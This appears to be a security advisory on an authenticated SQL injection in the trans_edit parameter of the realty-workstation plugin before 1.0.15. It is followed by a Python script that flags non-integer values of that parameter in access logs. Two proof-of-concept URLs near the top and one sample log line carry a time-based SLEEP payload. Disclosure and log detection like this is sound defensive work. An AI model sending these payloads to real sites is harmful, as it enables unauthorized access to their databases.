The plugin does not sanitise and escape the trans_edit parameter before using it in a SQL statement when an agent edits a transaction, leading to an SQL injection.
As a logged-in agent:
https://example.com/workstation/?transactions=open_transactions&trans_edit=1 AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)
https://example.com/workstation/?transactions=open_agent_transactions&trans_edit=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)
CPE
Name | Operator | Version |
---|---|---|
realty-workstation | lt | 1.0.15 |
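
For sites still running an affected version, web access logs can be checked for trans_edit values that are not plain integers. The following is an added example, not code from the plugin or the advisory. It assumes combined-format access logs and that a legitimate transaction id consists only of digits; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
PARAM = "trans_edit"              # parameter named in the advisory
INTEGER_RE = re.compile(r"\d+")   # assumption: a valid transaction id is all digits


def suspicious_values(line):
    """Return the trans_edit values in one log line that are not plain integers."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    query = urlsplit(match.group("target")).query
    flagged = []
    for value in parse_qs(query, keep_blank_values=True).get(PARAM, []):
        # parse_qs decodes once; decode again so double-encoded input
        # is reported in readable form.
        decoded = unquote(value).strip()
        if not INTEGER_RE.fullmatch(decoded):
            flagged.append(decoded)
    return flagged


def scan(lines):
    """Return (client_ip, value) for every non-integer trans_edit value."""
    hits = []
    for line in lines:
        for value in suspicious_values(line):
            hits.append((line.split(" ", 1)[0], value))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /workstation/?transactions=open_transactions&trans_edit=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /workstation/?transactions=open_transactions&trans_edit=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b) HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:11 +0000] "GET /workstation/?transactions=open_agent_transactions&trans_edit=7%2520x HTTP/1.1" 200 5120',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /workstation/ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent non-integer {PARAM}: {value!r}")
```

A hit only shows that a non-integer value was requested; whether the request came from an authenticated agent session has to be confirmed from the application side.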